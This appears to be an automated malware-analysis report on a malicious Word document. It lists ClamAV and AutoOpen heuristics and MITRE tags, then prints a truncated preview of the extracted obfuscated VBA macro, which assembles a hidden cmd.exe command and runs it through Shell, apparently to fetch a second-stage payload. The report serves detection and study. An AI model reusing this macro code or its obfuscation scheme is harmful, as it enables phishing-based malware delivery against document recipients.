MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, a common technique for initial execution. The macro's primary function appears to be downloading and executing a second-stage payload, as indicated by the Shell function call with a constructed string. The ClamAV detection further confirms its malicious nature.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6775505-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6775505-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31588 bytes |
SHA-256: 79d4aceb7cbc3fe654258c92bd622aa84a25d9672b545b2bc989b9057acf0142 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mwDiRYBkwsuFz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
ddHvM = 943
KHdjdn = kbiFqN
dvUpBz = Round(45)
JEiLOZ = ChrB(KTuYJu - QutOc)
RNOqCtXTTZl = "" + RcPMHflpDnlML + AHCBJdDClBo + CVar("cm") + jJbUSRMDO + FpoBDbYACw + wjfzzIuP + JwtHwK + qltazh + pdOcMM + tHoYjDZ + KbLLA + zYiIh + zbNSMHc + cfkbqkkC + NGcRbhvv + zYiGjMYj + zwRczS + lSuQiQ + ViSoVQcXvK + JTPII + LmtwwY + jHMwwrf + tRnbwzTv + wvrdXpU + aiWtcbqYfl + IMtSwTN + FUlNZnWV + tiJYUz + oqvLFRFbOO + SZpsN + cFAvnlSLO + bczZAts + jvhYqId + UILvuz + WpfVkbzK + QmwGAATJVm + MAozvJfEQ + uazPLLDcw + AZmFa + SVzWt + amOSfmi + XvCZQEaKwX + lMqiAwMbYwk + LtIVlYcjtQ + tpAWh + YDUREz + hOZVRQjGwdjPG + fHrKdGoVT
IOWMaU = fNJjYt
Shell@ RNOqCtXTTZl, 0
QwDQWl = Hex(JuIwz * stFNlI * 39968 / lDPiaw)
End Sub
Attribute VB_Name = "izKSTYWQqIXLMS"
Function wjfzzIuP()
On Error Resume Next
UmMilN = "d "
wlkBIzA = " /c" + " " + " c"
qhpMAIbv = "mD.Ex" + "e /V:O /R" + " " + CStr(Chr(EhzMDKiIrCR + hXtlqiqVIVa + 34 + UJQqsiavVsBMsV + UPaVNYPwjWA)) + " " + "set ~'" + "{=-"
EIXnIP = 135976746
AjwnbksZNA = "_\--/" + "_-///\\__ " + "/__\" + "\_\-_/-/-"
ZGuJn = MbSiaj
PZtbY = Hex(nJmwmz * OOjWI - zLaFj / PBwpO)
zvuzpK = "\/ _" + "/_" + "-/_-/-_\" + "-/\\ \\--" + "//_-\"
hjzYJW = HqicR
GUEtY = CStr(608)
tIHmGq = CSng(MoUJT * qoUYY)
kCfiZLaKSs = "__/\-_" + " _\\_////\" + "--_\-" + "- \_/-__" + "-\/_-\\" + "/-" + " \-\"
NNKzZ = 7308
GpdiDl = CDbl(KCHDMk)
EoNjNHJcVFz = "\_-/_" + "_///\"
GDVzQF = oimUO
Awjiwm = CLng(HzGNNP / 30354)
NdGOi = "-- /" + "_\/-/-\" + "_-\-/__ " + "\-//_//_" + "--\\"
wjfzzIuP = UmMilN + wlkBIzA + qhpMAIbv + AjwnbksZNA + zvuzpK + kCfiZLaKSs + EoNjNHJcVFz + NdGOi
MRsdiU = fYGzG
End Function
Function JwtHwK()
On Error Resume Next
rfulv = CDate(7)
ozTRs = 433986341
sWfArGkIz = "_\_ _" + "-\\-_-\" + "//" + "/_/-" + "_ _\-/-/" + "_\/-\_/-_" + " \__"
QzFRXw = 40
hBXMA = Round(WlMYDX)
PzizMG = "\--////\" + "\-__ -" + "/\" + "__/\/" + "-\\-" + "__/ -"
WPRLHt = Chr(78592 + NAOujd)
hXCaNj = YBTGZw
ijXoHv = "__/\\-/" + "-_\\/-_"
mMqowV = 457109648
aJZmN = " /---\\/\"
NGszQs = "\/-___" + "/ //" + "_\-" + "\/_--"
vZwwanVWN = "/_\" + "_" + "\ /" + "/" + "_-" + "-\_\_-\/"
EYuHJr = mvXjwd
LuHjK = Oct(vsYoZz - PuZFLm)
zCDqR = CDate(9615)
jLdYuL = "-_\" + " " + "/\__\-" + "-/" + "_/-\\-/}\" + "\__//"
kGAzsGoO = "_//-\--" + "-\}-/\\"
JwtHwK = sWfArGkIz + PzizMG + ijXoHv + aJZmN + NGszQs + vZwwanVWN + jLdYuL + kGAzsGoO
hkzRz = Tan(JvKOz)
End Function
Function qltazh()
On Error Resume Next
DQzprAiv = "\\/__--//"
iijYHW = Oct(YBvBF * RqCKvL * 8166 * bnUun)
jZHELSww = "_-" + "{-" + "_-\_//\-"
vsoJzs = Sin(QFMMH)
IAvWSIMwl = "-\/\_/h/\/" + "-\_-/-/__\" + "-_" + "c_-_/__-" + "/\/\"
EiwzPs = ChrW(95856402)
dUHOb = CMvfY
QrnsE = Atn(13888 + EtYZD)
kMlRJzOLZp = "\-\/" + "t_-/" + "\\/_" + "-_-\/\/" + "-a-/--_" + "//\-\\\_"
TSUwV = Hex(bKKHHa)
FshcAE = Rnd(4)
AWuqr = Fix(vlXpME)
lVnOqF = "/_c_\-/" + "_\_/\--\/" + "/_}" + "/-\_\\" + "//_-" + "\"
IwtUhVi = "-__/;" + "\//-" + "--"
UjWsaBnzU = "\_" + "/" + "_/\_-_k"
kOOQK = CInt(445)
JlJhnYi = "-_-/" + "/\_" + "_/\\_"
zOEmYoRscHB = "/\-" + "a" + "\--_-\\" + "/__/_-/\" + "e/-__\\_-" + "-/\\/-" + "_r/\---"
qltazh = DQzprAiv + jZHELSww + IAvWSIMwl + kMlRJzOLZp + lVnOqF + IwtUhVi + UjWsaBnzU + JlJhnYi + zOEmYoRscHB
mnlzj = Chr(86867 - VfAWcu)
tSAJM = ChrB(FzBZUX)
icptF = ChrW(65415 * izGsD)
End Function
Function pdOcMM()
On Error Resume Next
MopHLAi = "_\\//\__"
AvEUl = Atn(57836535)
ajtOU = Sqr(501637661)
vajHondzhbt = "_-b\_" + "_/\"
nkkjq = 468
hlBwM = Sin(tUikX)
wjSKMVsizfC = "_/\/"
cRJSXIQ = "----\" + "/;-\_//" + "/_-\-\_-_\"
pdOcMM = MopHLAi + vajHondzhbt + wjSKMVsizfC + cRJSXIQ
iiuqXl =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.